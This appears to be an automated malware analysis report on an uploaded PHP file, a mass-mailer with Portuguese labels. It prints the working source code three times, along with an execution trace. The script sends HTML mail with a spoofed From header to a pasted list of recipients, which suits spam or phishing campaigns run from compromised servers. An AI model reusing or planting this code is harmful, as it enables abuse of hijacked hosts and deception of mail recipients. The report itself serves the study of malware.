PHP Malware Analysis
Thund3rC4sH.php
md5: 90c604a876418d1c7932c46577560a50
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Original)
Environment
- set_time_limit (Deobfuscated, HTML, Original)
Input
- _POST (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
if (empty($_POST['Sa007'])) {
$Sa002 = '';
$Sa003 = '';
$Sa004 = '';
$Sa005 = '';
?>
<DIV STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
<FORM NAME="Sa001" METHOD="POST" ACTION="<?php
echo $_SERVER['PHP_SELF'] . "?" . $_SERVER['QUERY_STRING'];
?>">
<P STYLE="MARGIN: 2PX;">
<B>N</B>ome: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<INPUT TYPE="TEXT" SIZE="45" NAME="Sa002" VALUE="<?php
echo "";
?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
</P>
<P STYLE="MARGIN: 2PX;">
<B>E</B>-Mail: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<INPUT TYPE="TEXT" SIZE="45" NAME="Sa003" VALUE="<?php
echo "";
?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
</P>
<P STYLE="MARGIN: 2PX;">
<B>A</B>ssunto: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<INPUT TYPE="TEXT" SIZE="45" NAME="Sa004" VALUE="<?php
echo "";
?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
</P>
<P STYLE="MARGIN: 2PX;">
<B>E</B>ngenharia: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<TEXTAREA COLS="42" ROWS="10" NAME="Sa005" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"><?php
echo "";
?></TEXTAREA>
</P>
<P STYLE="MARGIN: 2PX;">
<B>L</B>ist Mail: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<TEXTAREA COLS="42" ROWS="10" NAME="Sa006" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"></TEXTAREA>
</P>
<P STYLE="MARGIN: 2PX;">
<INPUT TYPE="SUBMIT" NAME="Sa007" VALUE="Go!" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;BORDER: 1PX Solid #000000;"></TEXTAREA>
</P>
</FORM>
</DIV>
<?php
} else {
@set_time_limit(0);
$Sa = $_POST['Sa002'];
$Sb = $_POST['Sa003'];
$Sc = $_POST['Sa004'];
$Sd = $_POST['Sa005'];
$Se = $_POST['Sa006'];
$Sf = explode("\n", $Se);
$Sg = sizeof($Sf);
function xsend($Xa, $Xb, $Xc, $Xd, $Xe)
{
$Xf = "MIME-Version: 1.0\n";
$Xf = "MIME-Version: 1.0\nContent-Type: text/html; charset=ISO-8859-1\n";
$Xf = "MIME-Version: 1.0\nContent-Type: text/html; charset=ISO-8859-1\nContent-Transfer-Encoding: 7bit\n";
$Xf = "MIME-Version: 1.0\nContent-Type: text/html; charset=ISO-8859-1\nContent-Transfer-Encoding: 7bit\nContent-Disposition: inline\n";
$Xf .= "From: \"" . $Xa . "\" <" . $Xb . ">\n";
return @mail($Xc, $Xd, "\n" . stripslashes($Xe) . "\n", $Xf);
}
$Sz = 1;
print "<DIV STYLE=\"FONT-FAMILY: 'Courier New';FONT-SIZE: 13px;\">";
foreach ($Sf as $Sh) {
$Si = trim($Sh);
$Sj = xsend($Sa, $Sb, $Si, $Sc, $Sd);
if (!empty($Sj)) {
print "<P STYLE=\"MARGIN: 2PX;COLOR: #0000FF;\">";
print "[{$Sz}/{$Sg}] [ OK ] Enviando...: {$Si}!";
print "</P>";
} else {
print "<P STYLE=\"MARGIN: 2PX;COLOR: #FF0000;\">";
print "[{$Sz}/{$Sg}] [Falhou] Enviando...: {$Si}!";
print "</P>";
}
$Sz++;
}
print "</DIV>";
}
?>
Execution traces
data/traces/90c604a876418d1c7932c46577560a50_trace-1676243664.0934.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:14:49.991249]
1 0 1 0.000161 393576
1 3 0 0.000223 399216 {main} 1 /var/www/html/uploads/Thund3rC4sH.php 0 0
1 3 1 0.000272 399216
0.000299 314264
TRACE END [2023-02-12 21:14:49.991419]
Generated HTML code
<html><head></head><body><div style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
<form name="Sa001" method="POST" action="/Thund3rC4sH.php?">
<p style="MARGIN: 2PX;">
<b>N</b>ome: <br>
</p>
<p style="MARGIN: 2PX;">
<input type="TEXT" size="45" name="Sa002" value="" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
</p>
<p style="MARGIN: 2PX;">
<b>E</b>-Mail: <br>
</p>
<p style="MARGIN: 2PX;">
<input type="TEXT" size="45" name="Sa003" value="" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
</p>
<p style="MARGIN: 2PX;">
<b>A</b>ssunto: <br>
</p>
<p style="MARGIN: 2PX;">
<input type="TEXT" size="45" name="Sa004" value="" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
</p>
<p style="MARGIN: 2PX;">
<b>E</b>ngenharia: <br>
</p>
<p style="MARGIN: 2PX;">
<textarea cols="42" rows="10" name="Sa005" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"></textarea>
</p>
<p style="MARGIN: 2PX;">
<b>L</b>ist Mail: <br>
</p>
<p style="MARGIN: 2PX;">
<textarea cols="42" rows="10" name="Sa006" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"></textarea>
</p>
<p style="MARGIN: 2PX;">
<input type="SUBMIT" name="Sa007" value="Go!" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;BORDER: 1PX Solid #000000;">
</p>
</form>
</div>
<!--?
} else {
@set_time_limit(0);
$Sa=$_POST['Sa002'];
$Sb=$_POST['Sa003'];
$Sc=$_POST['Sa004'];
$Sd=$_POST['Sa005'];
$Se=$_POST['Sa006'];
$Sf=explode("\n",$Se);
$Sg=sizeof($Sf);
function xsend($Xa,$Xb,$Xc,$Xd,$Xe) {
$Xf = "MIME-Version: 1.0\n";
$Xf .= "Content-Type: text/html; charset=ISO-8859-1\n";
$Xf .= "Content-Transfer-Encoding: 7bit\n";
$Xf .= "Content-Disposition: inline\n";
$Xf .= "From: \"".$Xa."\" <".$Xb."-->\n";
return @mail($Xc,$Xd,"\n".stripslashes($Xe)."\n",$Xf);
}
$Sz=1;
print("<div style="\"FONT-FAMILY:" 'courier="" new';font-size:="" 13px;\"="">");
foreach($Sf as $Sh) {
$Si=trim($Sh);
$Sj=xsend($Sa,$Sb,$Si,$Sc,$Sd);
if (!empty($Sj)) {
print("<p style="\"MARGIN:" 2px;color:="" #0000ff;\"="">");
print("[{$Sz}/{$Sg}] [ OK ] Enviando...: {$Si}!");
print("</p>");
} else {
print("<p style="\"MARGIN:" 2px;color:="" #ff0000;\"="">");
print("[{$Sz}/{$Sg}] [Falhou] Enviando...: {$Si}!");
print("</p>");
}
$Sz++;
}
print("</div>");
}
?>
</body></html>Original PHP code
<?
if (empty($_POST['Sa007'])) {
$Sa002='';
$Sa003='';
$Sa004='';
$Sa005='';
?>
<DIV STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
<FORM NAME="Sa001" METHOD="POST" ACTION="<?=$_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING'];?>">
<P STYLE="MARGIN: 2PX;">
<B>N</B>ome: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<INPUT TYPE="TEXT" SIZE="45" NAME="Sa002" VALUE="<?=$Sa002 ? $Sa002 : "";?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
</P>
<P STYLE="MARGIN: 2PX;">
<B>E</B>-Mail: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<INPUT TYPE="TEXT" SIZE="45" NAME="Sa003" VALUE="<?=$Sa003 ? $Sa003 : "";?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
</P>
<P STYLE="MARGIN: 2PX;">
<B>A</B>ssunto: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<INPUT TYPE="TEXT" SIZE="45" NAME="Sa004" VALUE="<?=$Sa004 ? $Sa004 : "";?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
</P>
<P STYLE="MARGIN: 2PX;">
<B>E</B>ngenharia: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<TEXTAREA COLS="42" ROWS="10" NAME="Sa005" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"><?=$Sa005 ? htmlspecialchars(base64_decode($Sa005)) : "";?></TEXTAREA>
</P>
<P STYLE="MARGIN: 2PX;">
<B>L</B>ist Mail: <BR>
</P>
<P STYLE="MARGIN: 2PX;">
<TEXTAREA COLS="42" ROWS="10" NAME="Sa006" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"></TEXTAREA>
</P>
<P STYLE="MARGIN: 2PX;">
<INPUT TYPE="SUBMIT" NAME="Sa007" VALUE="Go!" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;BORDER: 1PX Solid #000000;"></TEXTAREA>
</P>
</FORM>
</DIV>
<?
} else {
@set_time_limit(0);
$Sa=$_POST['Sa002'];
$Sb=$_POST['Sa003'];
$Sc=$_POST['Sa004'];
$Sd=$_POST['Sa005'];
$Se=$_POST['Sa006'];
$Sf=explode("\n",$Se);
$Sg=sizeof($Sf);
function xsend($Xa,$Xb,$Xc,$Xd,$Xe) {
$Xf = "MIME-Version: 1.0\n";
$Xf .= "Content-Type: text/html; charset=ISO-8859-1\n";
$Xf .= "Content-Transfer-Encoding: 7bit\n";
$Xf .= "Content-Disposition: inline\n";
$Xf .= "From: \"".$Xa."\" <".$Xb.">\n";
return @mail($Xc,$Xd,"\n".stripslashes($Xe)."\n",$Xf);
}
$Sz=1;
print("<DIV STYLE=\"FONT-FAMILY: 'Courier New';FONT-SIZE: 13px;\">");
foreach($Sf as $Sh) {
$Si=trim($Sh);
$Sj=xsend($Sa,$Sb,$Si,$Sc,$Sd);
if (!empty($Sj)) {
print("<P STYLE=\"MARGIN: 2PX;COLOR: #0000FF;\">");
print("[{$Sz}/{$Sg}] [ OK ] Enviando...: {$Si}!");
print("</P>");
} else {
print("<P STYLE=\"MARGIN: 2PX;COLOR: #FF0000;\">");
print("[{$Sz}/{$Sg}] [Falhou] Enviando...: {$Si}!");
print("</P>");
}
$Sz++;
}
print("</DIV>");
}
?>